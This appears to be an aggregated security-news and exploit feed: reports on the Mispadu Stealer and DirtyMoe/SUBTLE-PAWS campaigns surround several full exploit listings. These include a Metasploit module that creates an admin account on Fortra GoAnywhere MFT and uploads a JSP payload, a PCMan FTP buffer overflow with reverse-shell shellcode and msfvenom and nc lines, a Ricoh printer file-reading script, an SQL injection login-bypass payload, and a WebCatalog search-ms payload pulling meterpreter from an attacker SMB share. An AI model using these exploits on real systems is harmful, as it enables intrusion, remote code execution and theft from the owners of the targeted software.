By Waqas
The new variant of Mispadu Stealer was discovered by Palo Alto's Unit 42 researchers while investigating the Windows Defender SmartScreen vulnerability.
This is a post from HackRead.com Read the original post: Mispadu Stealer’s New Variant Targets Browser Data of Mexican Users

Originally, since 2019, Mispadu Stealer targeted Spanish- and Portuguese-speaking victims, but the new variant aims at URLs associated with Mexican citizens.

In a recent development reported by Unit 42 researchers, a new variant of the infamous Mispadu Stealer has emerged, targeting users primarily in Mexico with stealthy information-stealing techniques. The discovery shows the persistent evolution of this malware, showcasing its adaptability and the challenges it poses to cybersecurity efforts.

Initially identified in 2019, Mispadu Stealer has been a persistent threat, known for its stealthy operations primarily targeting Spanish- and Portuguese-speaking victims. The latest variant, however, demonstrates a high level of sophistication, specifically targeting regions and URLs associated with Mexican citizens.

The discovery of this new variant came as part of Unit 42’s Managed Threat Hunting initiative, while researchers were investigating the Windows Defender SmartScreen CVE-2023-36025 vulnerability.

This vulnerability, categorized as a security feature bypass within the Windows SmartScreen function, allows attackers to circumvent warnings and execute malicious payloads. Exploiting this vulnerability, the Mispadu Stealer variant was found to employ a crafty technique involving the creation of internet shortcut files (.url) or hyperlinks pointing to malicious files, effectively bypassing SmartScreen’s warnings.

One of the key findings in this investigation is the malware’s use of a parameter referencing a network share, which, when embedded in a .url file, directs victims to a threat actor’s network share to retrieve and execute the malicious payload without triggering SmartScreen warnings. This technique, while not limited to Mispadu Stealer, showcases the malware’s ability to adapt and evolve its tactics.

Further analysis of the new variant reveals a sophisticated operation that selectively targets victims based on their geographic location and system configurations. By querying the bias between the local time zone and UTC and performing checks based on the victim’s location, the malware ensures its execution primarily within specific regions, such as the Americas and certain parts of Western Europe.

Statistics of infected countries (Unit 42)

Once executed, the malware proceeds to interact with the victim’s browser history, extracting URLs and checking them against a targeted list. Notably, the malware employs encryption algorithms and techniques to evade detection, highlighting the evolving sophistication of its information-stealing capabilities.

The attribution of this new variant to previous Mispadu campaigns highlights the challenges in combating evolving cybersecurity threats. While similarities in tactics and infrastructure provide insights into the malware’s origins, the ever-changing nature of such threats demands a comprehensive approach to cybersecurity.

As Mispadu continues to evolve and target unsuspecting users, cybersecurity experts emphasize the importance of staying informed on the latest threat intelligence, deploying strong endpoint protection measures, and advocating a culture of cybersecurity awareness among employees and users. By adopting proactive measures and leveraging collective intelligence, organizations can better defend against emerging threats like the new variant of Mispadu Stealer.

1.  **Mirai Variant V3G4 Exploiting IoT Devices for DDoS Attacks**
2.  **IBM X-Force Discovers Gootloader Malware Variant- GootBot**
3.  **Fake TeamViewer download ads distributing new ZLoader variant**
4.  **New Agent Tesla Variant Uses Excel Exploit to Infect Windows PCs**
5.  **MidgeDropper Variant Hits Work-from-Home Employees on Windows**

Mispadu Stealer’s New Variant Targets Browser Data of Mexican Users

This Metasploit module exploits a vulnerability in Fortra GoAnywhere MFT that allows an unauthenticated attacker to create a new administrator account. This can be leveraged to upload a JSP payload and achieve RCE. GoAnywhere MFT versions 6.x from 6.0.1, and 7.x before 7.4.1 are vulnerable.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::FileDropper  include Msf::Auxiliary::Report  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Fortra GoAnywhere MFT Unauthenticated Remote Code Execution',        'Description' => %q{          This module exploits a vulnerability in Fortra GoAnywhere MFT that allows an unauthenticated attacker to          create a new administrator account. This can be leveraged to upload a JSP payload and achieve RCE. GoAnywhere          MFT versions 6.x from 6.0.1, and 7.x before 7.4.1 are vulnerable.        },        'License' => MSF_LICENSE,        'Author' => [          'sfewer-r7', # MSF RCE Exploit          'James Horseman', # Original auth bypass PoC/Analysis          'Zach Hanley' # Original auth bypass PoC/Analysis        ],        'References' => [          ['CVE', '2024-0204'],          ['URL', 'https://www.fortra.com/security/advisory/fi-2024-001'], # Vendor Advisory          ['URL', 'https://www.horizon3.ai/cve-2024-0204-fortra-goanywhere-mft-authentication-bypass-deep-dive/']        ],        'DisclosureDate' => '2024-01-22',        'Platform' => %w[linux win],        'Arch' => [ARCH_JAVA],        'Privileged' => true, # Could be 'NT AUTHORITY\SYSTEM' on Windows, or a non-root user 'gamft' on Linux.        'Targets' => [          [            # Tested on GoAnywhere 7.4.0 with the payload java/jsp_shell_reverse_tcp            'Automatic', {}          ],          [            'Linux',            {              'Platform' => 'linux',              'GOANYWHERE_INSTALL_PATH' => '/opt/HelpSystems/GoAnywhere'            }          ],          [            'Windows',            {              'Platform' => 'win',              'GOANYWHERE_INSTALL_PATH' => 'C:\\Program Files\\Fortra\\GoAnywhere\\'            },          ],        ],        'DefaultOptions' => {          'RPORT' => 8001,          'SSL' => true        },        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [            IOC_IN_LOGS,            # A new admin account is created, which the exploit can't destroy.            CONFIG_CHANGES,            # The upload may leave payload artifacts if the FileDropper mixins cleanup handlers cannot delete them.            ARTIFACTS_ON_DISK          ]        }      )    )    register_options(      [        OptString.new('TARGETURI', [true, 'The base path to the web application', '/goanywhere/']),      ]    )  end  def check    # We can query an undocumented unauthenticated REST API endpoint and pull the version number.    res = send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, '/rest/gacmd/v1/system')    )    return CheckCode::Unknown('Connection failed') unless res    return CheckCode::Unknown("Received unexpected HTTP status code: #{res.code}.") unless res.code == 200    json_data = res.get_json_document    product = json_data.dig('data', 'product')    version = json_data.dig('data', 'version')    return CheckCode::Unknown('No version information in response') if product.nil? || version.nil?    # As per the Fortra advisory, the following version are affected:    # * Fortra GoAnywhere MFT 6.x from 6.0.1    # * Fortra GoAnywhere MFT 7.x before 7.4.1    # This seems to imply version 6.0.1 through to 7.4.0 (inclusive) are vulnerable.    if Rex::Version.new(version).between?(Rex::Version.new('6.0.1'), Rex::Version.new('7.4.0'))      return CheckCode::Appears("#{product} #{version}")    end    Exploit::CheckCode::Safe("#{product} #{version}")  end  def exploit    # CVE-2024-0204 allows an unauthenticated attacker to create a new administrator account on the target system. So    # we generate the username/password pair we want to use.    # Note: We cannot delete the administrator account that we create.    admin_username = Rex::Text.rand_text_alpha_lower(8)    admin_password = Rex::Text.rand_text_alphanumeric(16)    # By using a double dot path segment with a semicolon in it, we can bypass the servers attempts to block access to    # the /wizard/InitialAccountSetup.xhtml endpoint that allows new admin account creation. As we leverage a double    # dot path segment, we need a directory to navigate down from, there are many available on the target so we pick    # a random one that we know works.    path_segments = %w[styles fonts auth help]    path_segment = path_segments.sample    # This is CVE-2024-0204...    initialaccountsetup_endpoint = "/#{path_segment}/..;/wizard/InitialAccountSetup.xhtml"    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, initialaccountsetup_endpoint),      'keep_cookies' => true,      'vars_post' => {        'javax.faces.ViewState' => get_viewstate(initialaccountsetup_endpoint),        'j_id_u:creteAdminGrid:username' => admin_username,        'j_id_u:creteAdminGrid:password' => admin_password,        'j_id_u:creteAdminGrid:password_hinput' => admin_password,        'j_id_u:creteAdminGrid:confirmPassword' => admin_password,        'j_id_u:creteAdminGrid:confirmPassword_hinput' => admin_password,        'j_id_u:creteAdminGrid:submitButton' => '',        'createAdminForm_SUBMIT' => 1      }    )    # The method com.linoma.ga.ui.admin.users.InitialAccountSetupForm.InitialAccountSetupForm.submit will call method    # loginNewAdminUser and update our current session, so we dont need to manually login.    unless res&.code == 302 && res.headers['Location'] == normalize_uri(target_uri.path, 'Dashboard.xhtml')      fail_with(Failure::UnexpectedReply, "Unexpected reply 1 from #{initialaccountsetup_endpoint}")    end    print_status("Created account: #{admin_username}:#{admin_password}. Note: This account will not be deleted by the module.")    store_credentials(admin_username, admin_password)    # Automatic targeting will detect the OS and product installation directory, by querying the About.xhtml page.    if target.name == 'Automatic'      res = send_request_cgi(        'method' => 'GET',        'uri' => normalize_uri(target_uri.path, '/help/About.xhtml'),        'keep_cookies' => true      )      unless res&.code == 200        fail_with(Failure::UnexpectedReply, 'Unexpected reply 2 from About.xhtml')      end      # The OS name could be something like "Linux" or "Windows Server 2022". Under the hood, GoAnywhere is using      # the Java system property "os.name".      os_match = res.body.match(%r{<span id="AboutForm:\S+:OSName">(.+)</span>})      unless os_match        fail_with(Failure::UnexpectedReply, 'Did not locate OSName in About.xhtml')      end      # To perform the JSP payload upload, we need to know the product installation path.      install_match = res.body.match(%r{<span id="AboutForm:\S+:goAnywhereHome">(.+)</span>})      unless install_match        fail_with(Failure::UnexpectedReply, 'Did not locate goAnywhereHome in About.xhtml')      end      # Find the Metasploit target (Linux/Windows) via a substring of the OS name we get back from GoAnywhere.      found_target = targets.find do |t|        os_match[1].downcase.include? t.name.downcase      end      unless found_target        fail_with(Failure::NoTarget, "Unable to select an automatic target for '#{os_match[1]}'")      end      # Dup the target we found, as we patch in the GOANYWHERE_INSTALL_PATH below.      detected_target = found_target.dup      detected_target.opts['GOANYWHERE_INSTALL_PATH'] = install_match[1]      print_status("Automatic targeting, detected OS: #{detected_target.name}")      print_status("Automatic targeting, detected install path: #{detected_target['GOANYWHERE_INSTALL_PATH']}")    else      detected_target = target    end    # We are going to upload a JSP payload via the FileManager interface. We first have to get the FileManager, then    # change to the directory we want to upload to, then upload the file.    path_separator = detected_target['Platform'] == 'win' ? '\\' : '/'    # We drop the JSP payload to a location such as: /opt/HelpSystems/GoAnywhere/adminroot/PAYLOAD_NAME.jsp    adminroot_path = detected_target['GOANYWHERE_INSTALL_PATH']    adminroot_path += path_separator unless adminroot_path.end_with? path_separator    adminroot_path += 'adminroot'    adminroot_path += path_separator    viewstate = get_viewstate('/tools/filemanager/FileManager.xhtml')    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/tools/filemanager/FileManager.xhtml'),      'keep_cookies' => true,      'vars_post' => {        'javax.faces.ViewState' => viewstate,        'j_id_4u:j_id_4v:newPath_focus' => '',        'j_id_4u:j_id_4v:newPath_input' => '/',        'j_id_4u:j_id_4v:newPath_editableInput' => adminroot_path,        'j_id_4u:j_id_4v:NewPathButton' => '',        'j_id_4u_SUBMIT' => 1      }    )    unless res&.code == 200      fail_with(Failure::UnexpectedReply, 'Unexpected reply 4 from FileManager.xhtml')    end    # We require a regID value form the page to upload a file, so we pull that out here.    vs_input = res.get_html_document.at('input[name="reqId"]')    unless vs_input&.key? 'value'      fail_with(Failure::UnexpectedReply, 'Did not locate reqId in reply 4 from FileManager.xhtml')    end    request_id = vs_input['value']    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/tools/filemanager/FileManager.xhtml'),      'keep_cookies' => true,      'vars_post' => {        'javax.faces.ViewState' => viewstate,        'javax.faces.partial.ajax' => 'true',        'javax.faces.source' => 'uploadID',        'javax.faces.partial.execute' => 'uploadID',        'javax.faces.partial.render' => '@none',        'uploadID' => 'uploadID',        'uploadID_sessionCheck' => 'true',        'reqId' => request_id,        'whenFileExists_focus' => '',        'whenFileExists_input' => 'rename',        'uploaderType' => 'filemanager',        'j_id_4i_SUBMIT' =>  1      }    )    unless res&.code == 200      fail_with(Failure::UnexpectedReply, 'Unexpected reply 5 from FileManager.xhtml')    end    jsp_filename = Rex::Text.rand_text_alphanumeric(8) + '.jsp'    message = Rex::MIME::Message.new    message.add_part(request_id, nil, nil, 'form-data; name="reqId"')    message.add_part('', nil, nil, 'form-data; name="whenFileExists_focus"')    message.add_part('rename', nil, nil, 'form-data; name="whenFileExists_input"')    message.add_part('filemanager', nil, nil, 'form-data; name="uploaderType"')    message.add_part('1', nil, nil, 'form-data; name="j_id_4i_SUBMIT"')    message.add_part(viewstate, nil, nil, 'form-data; name="javax.faces.ViewState"')    message.add_part('true', nil, nil, 'form-data; name="javax.faces.partial.ajax"')    message.add_part('uploadID', nil, nil, 'form-data; name="javax.faces.partial.execute"')    message.add_part('uploadID', nil, nil, 'form-data; name="javax.faces.source"')    message.add_part('1', nil, nil, 'form-data; name="uniqueFileUploadId"')    message.add_part(payload.encoded, 'text/plain', nil, "form-data; name=\"uploadID\"; filename=\"#{jsp_filename}\"")    # We can now upload our payload...    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/tools/filemanager/FileManager.xhtml'),      'keep_cookies' => true,      'ctype' => 'multipart/form-data; boundary=' + message.bound,      'data' => message.to_s    )    unless res&.code == 200      fail_with(Failure::UnexpectedReply, 'Unexpected reply 6 from FileManager.xhtml')    end    # Register our payload so it is deleted when the session is created.    jsp_filepath = adminroot_path + jsp_filename    print_status("Dropped payload: #{jsp_filepath}")    # We are using the FileDropper mixin to automatically delete this file after a session has been created.    register_file_for_cleanup(jsp_filepath)    # A copy of the files this user uploads is left here:    # /opt/HelpSystems/GoAnywhere/userdata/documents/ADMIN_USERNAME/PAYLOAD_NAME.jsp    # We register these to be deleted, but they appear to be locked, preventing deleting.    userdoc_path = detected_target['GOANYWHERE_INSTALL_PATH']    userdoc_path += path_separator unless userdoc_path.end_with? path_separator    userdoc_path += 'userdata'    userdoc_path += path_separator    userdoc_path += 'documents'    userdoc_path += path_separator    userdoc_path += admin_username    userdoc_path += path_separator    register_file_for_cleanup(userdoc_path + jsp_filename)    register_dir_for_cleanup(userdoc_path)    # Finally, trigger our payload via a GET request...    send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, jsp_filename)    )    # NOTE: it is not possible to delete the user account we created as we cant delete ourself either via the web    # interface or REST API.  end  # Helper method to pull out a viewstate identifier from a requests HTML response.  def get_viewstate(endpoint)    res = send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, endpoint),      'keep_cookies' => true    )    unless res&.code == 200      fail_with(Failure::UnexpectedReply, "Unexpected reply during get_viewstate via '#{endpoint}'.")    end    vs_input = res.get_html_document.at('input[name="javax.faces.ViewState"]')    unless vs_input&.key? 'value'      fail_with(Failure::UnexpectedReply, "Did not locate ViewState during get_viewstate via '#{endpoint}'.")    end    vs_input['value']  end  def store_credentials(username, password)    service_data = {      address: datastore['RHOST'],      port: datastore['RPORT'],      service_name: 'GoAnywhere MFT Admin Interface',      protocol: 'tcp',      workspace_id: myworkspace_id    }    credential_data = {      origin_type: :service,      module_fullname: fullname,      username: username,      private_data: password,      private_type: :password    }.merge(service_data)    credential_core = create_credential(credential_data)    login_data = {      core: credential_core,      last_attempted_at: DateTime.now,      status: Metasploit::Model::Login::Status::SUCCESSFUL    }.merge(service_data)    create_credential_login(login_data)  endend

Fortra GoAnywhere MFT Unauthenticated Remote Code Execution

PCMan FTP Server version 2.0 pwn remote buffer overflow exploit.

    # Exploit Title: PCMan FTP Server 2.0 - 'pwd' Remote Buffer Overflow# Date: 09/25/2023# Exploit Author: Waqas Ahmed Faroouqi (ZEROXINN)# Vendor Homepage: http://pcman.openfoundry.org/# Software Link: https://www.exploit-db.com/apps/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z# Version: 2.0# Tested on: Windows XP SP3#!/usr/bin/pythonimport socket#buffer = 'A' * 2500#offset = 2007#badchars=\x00\x0a\x0d#return_address=0x7e429353 (USER32.dll)#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.146.130 LPORT=4444 EXITFUNC=thread -f c -b "\x00\x0a\x0d"#nc -nvlp 4444overflow = ("\xdb\xce\xd9\x74\x24\xf4\xba\xc1\x93\x3a\xcc\x58\x31\xc9""\xb1\x52\x31\x50\x17\x03\x50\x17\x83\x01\x97\xd8\x39\x7d""\x70\x9e\xc2\x7d\x81\xff\x4b\x98\xb0\x3f\x2f\xe9\xe3\x8f""\x3b\xbf\x0f\x7b\x69\x2b\x9b\x09\xa6\x5c\x2c\xa7\x90\x53""\xad\x94\xe1\xf2\x2d\xe7\x35\xd4\x0c\x28\x48\x15\x48\x55""\xa1\x47\x01\x11\x14\x77\x26\x6f\xa5\xfc\x74\x61\xad\xe1""\xcd\x80\x9c\xb4\x46\xdb\x3e\x37\x8a\x57\x77\x2f\xcf\x52""\xc1\xc4\x3b\x28\xd0\x0c\x72\xd1\x7f\x71\xba\x20\x81\xb6""\x7d\xdb\xf4\xce\x7d\x66\x0f\x15\xff\xbc\x9a\x8d\xa7\x37""\x3c\x69\x59\x9b\xdb\xfa\x55\x50\xaf\xa4\x79\x67\x7c\xdf""\x86\xec\x83\x0f\x0f\xb6\xa7\x8b\x4b\x6c\xc9\x8a\x31\xc3""\xf6\xcc\x99\xbc\x52\x87\x34\xa8\xee\xca\x50\x1d\xc3\xf4""\xa0\x09\x54\x87\x92\x96\xce\x0f\x9f\x5f\xc9\xc8\xe0\x75""\xad\x46\x1f\x76\xce\x4f\xe4\x22\x9e\xe7\xcd\x4a\x75\xf7""\xf2\x9e\xda\xa7\x5c\x71\x9b\x17\x1d\x21\x73\x7d\x92\x1e""\x63\x7e\x78\x37\x0e\x85\xeb\xf8\x67\x17\x6d\x90\x75\x17""\x63\x3d\xf3\xf1\xe9\xad\x55\xaa\x85\x54\xfc\x20\x37\x98"                                                                                           "\x2a\x4d\x77\x12\xd9\xb2\x36\xd3\x94\xa0\xaf\x13\xe3\x9a"                                                                                                             "\x66\x2b\xd9\xb2\xe5\xbe\x86\x42\x63\xa3\x10\x15\x24\x15"                                                                                                             "\x69\xf3\xd8\x0c\xc3\xe1\x20\xc8\x2c\xa1\xfe\x29\xb2\x28"                                                                                                             "\x72\x15\x90\x3a\x4a\x96\x9c\x6e\x02\xc1\x4a\xd8\xe4\xbb"                                                                                                             "\x3c\xb2\xbe\x10\x97\x52\x46\x5b\x28\x24\x47\xb6\xde\xc8"                                                                                                             "\xf6\x6f\xa7\xf7\x37\xf8\x2f\x80\x25\x98\xd0\x5b\xee\xb8"                                                                                                             "\x32\x49\x1b\x51\xeb\x18\xa6\x3c\x0c\xf7\xe5\x38\x8f\xfd""\x95\xbe\x8f\x74\x93\xfb\x17\x65\xe9\x94\xfd\x89\x5e\x94""\xd7")shellcode = 'A' * 2007 + "\x53\x93\x42\x7e" + "\x90" * 32 + overflow# Change IP/Port as required  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)try:        print "\nSending evil buffer..."        s.connect(('192.168.146.135',21))        data = s.recv(1024)        s.send('USER anonymous' +'\r\n')        data = s.recv(1024)        s.send('PASS anonymous\r\n')        s.send('pwd ' + shellcode + '\r\n')        s.close()        print "\nExploit completed successfully!."except:        print "Could not connect to FTP!"

PCMan FTP Server 2.0 Buffer Overflow

TP-LINK TL-WR740N suffers from an html injection vulnerability.

    # Exploit Title: TP-LINK TL-WR740N - Multiple HTML Injection Vulnerabilities# Date: 25/9/2023# Exploit Author: Shujaat Amin (ZEROXINN)# Vendor Homepage: http://www.tp-link.com # Version: TP-Link TL-WR740n 3.12.11 Build 110915 Rel.40896n# Tested on: Windows 10---------------------------POC-----------------------------1) Go to your routers IP (192.168.0.1)2) Go to Access control --> Target,rule3) Click on add new 5) Type <h1>Hello<h1> in Target Description box6) Click on Save, and now you can see html injection on the webpage

TP-LINK TL-WR740N HTML Injection

Ricoh printers suffer from directory and file exposure vulnerabilities.

    #Exploit Title: Ricoh Printer Directory and File Exposure #Date: 9/15/2023#Exploit Author: Thomas Heverin (Heverin Hacker)#Vendor Homepage: https://www.ricoh.com/products/printers-and-copiers#Software Link: https://replit.com/@HeverinHacker/Ricoh-Printer-Directory-and-File-Finder#main.py#Version: Ricoh Printers - All Versions#Tested on: Windows#CVE: N/A #Directories Found: Help, Info (Printer Information), Prnlog (Print Log), Stat (Statistics) and Syslog (System Log)from ftplib import FTPdef ftp_connect(ip):    try:        ftp = FTP(ip)        ftp.login("guest", "guest")        print(f"Connected to {ip} over FTP as 'guest'")        return ftp    except Exception as e:        print(f"Failed to connect to {ip} over FTP: {e}")        return Noneif __name__ == "__main__":    target_ip = input("Enter the Ricoh Printer IP address: ")        ftp_connection = ftp_connect(target_ip)    if ftp_connection:        try:            while True:                file_list = ftp_connection.nlst()                print("List of Ricoh printer files and directories:")                for index, item in enumerate(file_list, start=1):                    print(f"{index}. {item}")                                file_index = int(input("Enter the printer index of the file to read (1-based), or enter 0 to exit: ")) - 1                if file_index < 0:                    break                                if 0 <= file_index < len(file_list):                    selected_file = file_list[file_index]                    lines = []                    ftp_connection.retrlines("RETR " + selected_file, lines.append)                    print(f"Contents of '{selected_file}':")                    for line in lines:                        print(line)                else:                    print("Invalid file index.")        except Exception as e:            print(f"Failed to perform operation: {e}")        finally:            ftp_connection.quit()

Ricoh Printer Directory / File Exposure

Typora version 1.7.4 suffers from a command injection vulnerability.

    # Exploit Title: Typora v1.7.4 - OS Command Injection# Discovered by: Ahmet Ümit BAYRAM# Discovered Date: 13.09.2023# Vendor Homepage: http://www.typora.io# Software Link: https://download.typora.io/windows/typora-setup-ia32.exe# Tested Version: v1.7.4 (latest)# Tested on: Windows 2019 Server 64bit# # #  Steps to Reproduce # # ## Open the application# Click on Preferences from the File menu# Select PDF from the Export tab# Check the “run command” at the bottom right and enter your reverse shellcommand into the opened box# Close the page and go back to the File menu# Then select PDF from the Export tab and click Save# Reverse shell is ready!

Typora 1.7.4 Command Injection

Bank Locker Management System suffers from a remote SQL injection vulnerability.

    # Exploit Title: Bank Locker Management System - SQL Injection# Application: Bank Locker Management System# Date: 12.09.2023# Bugs: SQL Injection # Exploit Author: SoSPiro# Vendor Homepage: https://phpgurukul.com/# Software Link: https://phpgurukul.com/bank-locker-management-system-using-php-and-mysql/# Tested on: Windows 10 64 bit Wampserver ## Description:This report highlights a critical SQL Injection vulnerability discovered in the "Bank Locker Management System" application. The vulnerability allows an attacker to bypass authentication and gain unauthorized access to the application.## Vulnerability Details:- **Application Name**: Bank Locker Management System- **Software Link**: [Download Link](https://phpgurukul.com/bank-locker-management-system-using-php-and-mysql/)- **Vendor Homepage**: [Vendor Homepage](https://phpgurukul.com/)## Vulnerability Description:The SQL Injection vulnerability is present in the login mechanism of the application. By providing the following payload in the login and password fields:Payload: admin' or '1'='1-- -An attacker can gain unauthorized access to the application with administrative privileges.## Proof of Concept (PoC):1. Visit the application locally at http://blms.local (assuming it's hosted on localhost).2. Navigate to the "banker" directory: http://blms.local/banker/3. In the login and password fields, input the following payload:4. admin' or '1'='1-- -

Bank Locker Management System SQL Injection

WebCatalog versions prior to 48.8 call the Electron shell.openExternal function without verifying that the URL is for an http or https resource. This vulnerability allows an attacker to potentially execute code through arbitrary protocols on the victims machine by having users sync pages with malicious URLs. The victim has to interact with the link, which can then enable an attacker to bypass security measures for malicious file delivery.

    # Exploit Title: WebCatalog 48.4 - Arbitrary Protocol Execution# Date: 9/27/2023# Exploit Author: ItsSixtyN3in# Vendor Homepage: https://webcatalog.io/en/# Software Link: https://cdn-2.webcatalog.io/webcatalog/WebCatalog%20Setup%2052.3.0.exe# Version: 48.4.0# Tested on: Windows# CVE : CVE-2023-42222Vulnerability summary:WebCatalog before version 48.8 calls the Electron shell.openExternal function without verifying that the URL is for an http or https resource. This vulnerability allows an attacker to potentially execute code through arbitrary protocols on the victims machine by having users sync pages with malicious URLs. The victim has to interact with the link, which can then enable an attacker to bypass security measures for malicious file delivery.Exploit details:-   Create a reverse shell file.msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > reverse.exe-   Host a reverse shell file (or otherwise) on your own SMB share using impacket (https://github.com/fortra/impacket/blob/master/examples/smbserver.py)python3 smbserver.py Tools -smb2support-   Have the user sync a page with the payload as a renamed link[Friendly Link](Search-ms://query=<FileName>&crumb=location\\<attackerIP>\<attackerSMBShare>&displayname=Spoofed%20Windows%20Title)Payload:search-ms://query=<FileName>&crumb=location\\<attackerIP>\<attackerSMBShare>&displayname=Spoofed%20Windows%20TitleTobias DiehlSecurity ConsultantOSCP, CRTO, CEH, PenTest+, AZ-500, SC-200/300Pronouns: he/hime-mail:  tobias.diehl@bulletproofsi.com

WebCatalog 48.4 Arbitrary Protocol Execution / Code Execution

7 Sticky Notes version 1.9 suffers from a command injection vulnerability.

    # Exploit Title: 7 Sticky Notes v1.9 - OS Command Injection# Discovered by: Ahmet Ümit BAYRAM# Discovered Date: 12.09.2023# Vendor Homepage: http://www.7stickynotes.com# Software Link:http://www.7stickynotes.com/download/Setup7StickyNotesv19.exe# Tested Version: 1.9 (latest)# Tested on: Windows 2019 Server 64bit# # #  Steps to Reproduce # # ## Open the program.# Click on "New Note".# Navigate to the "Alarms" tab.# Click on either of the two buttons.# From the "For" field, select "1" and "seconds" (to obtain the shellwithin 1 second).# From the "Action" dropdown, select "command".# In the activated box, enter the reverse shell command and click the "Set"button to set the alarm.# Finally, click on the checkmark to save the alarm.# Reverse shell obtained!

7 Sticky Notes 1.9 Command Injection

The Computer Emergency Response Team of Ukraine (CERT-UA) has warned that more than 2,000 computers in the country have been infected by a strain of malware called DirtyMoe.
The agency attributed the campaign to a threat actor it calls UAC-0027.
DirtyMoe, active since at least 2016, is capable of carrying out cryptojacking and distributed denial-of-service (DDoS) attacks. In March

The Computer Emergency Response Team of Ukraine (CERT-UA) has warned that more than 2,000 computers in the country have been infected by a strain of malware called DirtyMoe.

The agency attributed the campaign to a threat actor it calls **UAC-0027**.

DirtyMoe, active since at least 2016, is capable of carrying out cryptojacking and distributed denial-of-service (DDoS) attacks. In March 2022, cybersecurity firm Avast revealed the malware's ability to propagate in a worm-like fashion by taking advantage of known security flaws.

The DDoS botnet is known to be delivered by means of another malware referred to as Purple Fox or via bogus MSI installer packages for popular software such as Telegram. Purple Fox is also equipped with a rootkit that allows the threat actors to hide the malware on the machine and make it difficult to detect and remove.

The exact initial access vector used in the campaign targeting Ukraine is currently unknown. CERT-UA is recommending that organizations keep their systems up-to-date, enforce network segmentation, and monitor network traffic for any anomalous activity.

The disclosure comes as Securonix detailed an ongoing phishing campaign known as STEADY#URSA targeting Ukrainian military personnel with the goal of delivering a bespoke PowerShell backdoor dubbed SUBTLE-PAWS.

"The exploitation chain is relatively simple: it involves the target executing a malicious shortcut (.lnk) file which loads and executes a new PowerShell backdoor payload code (found inside another file contained within the same archive)," security researchers Den Iuzvyk, Tim Peck, and Oleg Kolesnikov said.

The attack is said to be related to a threat actor known as Shuckworm, which is also known as Aqua Blizzard (formerly Actinium), Armageddon, Gamaredon, Iron Tilden, Primitive Bear, Trident Ursa, UNC530, and Winterflounder. Active since at least 2013, it's assessed to be part of Russia's Federal Security Service (FSB).

SUBTLE-PAWS, in addition to setting up persistence on the host, uses Telegram's blogging platform called Telegraph to retrieve the command-and-control (C2) information, a technique previously identified as associated with the adversary since early 2023, and can propagate through removable attached drives.

Gamaredon's ability to spread via USB drives was also documented by Check Point in November 2023, which named the PowerShell-based USB worm LitterDrifter.

"The SUBTLE-PAWS backdoor uses advanced techniques to execute malicious payloads dynamically," the researchers said.

"They store and retrieve executable PowerShell code from the Windows Registry which can assist in evading traditional file-based detection methods. This approach also aids in maintaining persistence on the infected system, as the malware can initiate itself again after reboots or other interruptions."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#windows